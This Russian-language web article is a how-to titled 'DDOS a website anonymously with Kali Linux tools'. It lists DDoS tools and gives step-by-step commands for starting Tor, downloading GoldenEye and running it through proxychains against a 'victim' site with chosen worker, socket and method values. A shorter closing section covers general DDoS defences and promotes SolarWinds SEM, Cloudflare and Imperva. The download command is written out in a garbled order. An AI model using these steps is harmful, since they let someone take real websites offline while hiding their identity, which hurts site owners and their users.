DDOS веб-сайт анонимно с помощью инструментов Kali Linux
ФорсайтИнструменты DDOS атак способны направить большие нагрузки на HTTP-серверы и отключить их от обслуживания.
Что такое DDOS атака?
Такой тип атаки, это когда несколько скомпрометированных систем атакуют одну цель, которая запрещает доступ к сервису посетителя сайта.
В этой статье мы расскажем о том, как выполнить DDOS-атаку с Kali Linux.
Необходимые инструменты
- EtherApe - графический монитор сети, который графически отображает сетевую активность. Хосты и ссылки меняются в размере с трафиком. Отображение цветовых протоколов.
- Service Tor - Tor позволяет клиентам и ретрансляторам предлагать скрытые услуги. То есть вы можете предложить веб-сервер, SSH-сервер и т.д. Не раскрывая свой IP-адрес своим пользователям.
- Proxychains - последняя версия Proxychains поддерживает SOCKS5, SOCKS4 и HTTP CONNECT. Прокси-цепи можно смешивать с разными типами прокси.
- GoldenEye - GoldenEye - приложение на python, предназначенное только для целей тестирования безопасности.
Список лучших инструментов для DDOS атак
- HULK
- Tor's Hammer
- Slowloris
- LOIC
- Xoic
- DDOSIM
- RUDY
- DDOSIM—Layer 7 DDOS Simulator
- R-U-Dead-Yet
- PyLoris
- OWASP DOS HTTP POST
- DAVOSET
Как выполнить DDOS атаку на сайт?
1. Запустите etherape: etherape
, появится всплывающее окно, которое графически отображает сетевую активность.
2. Запустите службу TOR:service tor start
3. Загрузите Goldeneye
https://github.com/jseidl/GoldenEye wget
https://github.com/jseidl/GoldenEye
4. После загрузки распакуйте его в папку unzip GoldenEye-master.zip
5. Начать атаку
/GoldenEye-master# proxychains ./goldeneye.py
http://testdomain.com
- Делайте с аргументами
- Добавьте значения для рабочих (
-w
), сокетов (-s)
и метода (-m
)
./goldeneye.py victim-website.com -w 100 -s 70 -m post
Если вы не остановите атаку, то в некоторых случаях она "взорвется". Чтобы остановить атаку просто нажмите CTRL+C.
Общая защита от DDOS-атаки
- Снижение скорости IP-соединения.
- Используйте IDS, межсетевые экраны веб-приложений.
- Tweak Connection на порог IP.
- Защитите свои DNS-серверы.
- Установите средства защиты. Убедитесь, что у вас установлены соответствующие средства защиты как для ваших сетей, так и для ваших приложений. Сюда входят такие ключевые инструменты, как брандмауэры, программное обеспечение для мониторинга сети и антивирусные программы, а также системы мониторинга угроз. С их помощью вы можете отслеживать базовый сетевой трафик и настраивать оповещения о необычном поведении.
- Держите все в курсе. Все эти системы должны быть обновлены, чтобы гарантировать, что любые ошибки или проблемы исправлены. Обнаружение угроз как можно раньше - лучший способ предотвратить атаку DDoS-атак на важные сетевые инфраструктуры и повлиять на конечных пользователей.
Инструменты для предотвращения DDoS-атак
Есть несколько инструментов, которые я рекомендую для предотвращения и остановки DDoS-атак.
1. Security Event Manager
Для отслеживания поведения сети и маркировки угроз до того, как они станут чрезмерными, мне нравится SolarWinds Security Event Manager (SEM).
Способность быстро реагировать на угрозу жизненно необходима, поскольку инициативы в области безопасности могут быстро стать бесполезными, если их развертывание займет слишком много времени. SEM включает в себя автоматические ответы, которые могут блокировать подозрительный IP или USB, отключать вредоносные устройства или отключать их привилегии, а также уничтожать приложения, которые ведут себя неожиданным образом. Это означает, что задержки при работе с чем-то вроде атаки DDoS сводятся к минимуму.
SEM также контролирует целостность файлов и USB, поэтому, если что-то выглядит не так, его можно остановить.
SolarWinds SEM предлагается бесплатно для тридцатидневной пробной версии. После этого вы можете посмотреть цены для каждого узла.
2. Cloudflare
Cloudflare предлагает гибкий и масштабируемый инструмент, который объединяет несколько методов предотвращения DDoS в одном решении. Он предотвращает проникновение вредоносного и злонамеренного трафика в вашу сеть, а остальная часть сети остается функциональной и высокопроизводительной. Cloudflare использует базу данных репутации для отслеживания потенциальных угроз от злоумышленников.
Для предприятий Cloudflare стоит 200 долларов США в месяц, но на уровне предприятия вам необходимо связаться с Cloudflare для получения расценок.
3. Imperva
Средство защиты Imperva DDoS защищает всю сеть и защищает от атак с помощью обработки пакетов большой емкости. Он обеспечивает защиту от DDoS-атак как всегда, так и по требованию, в зависимости от того, что больше всего подходит вашему бизнесу, а также включает в себя автоматическое обновление панелей мониторинга, отображающих информацию о трафике атак. Основным недостатком инструмента Imperva является то, что он ограничен защитой от DDoS-атак.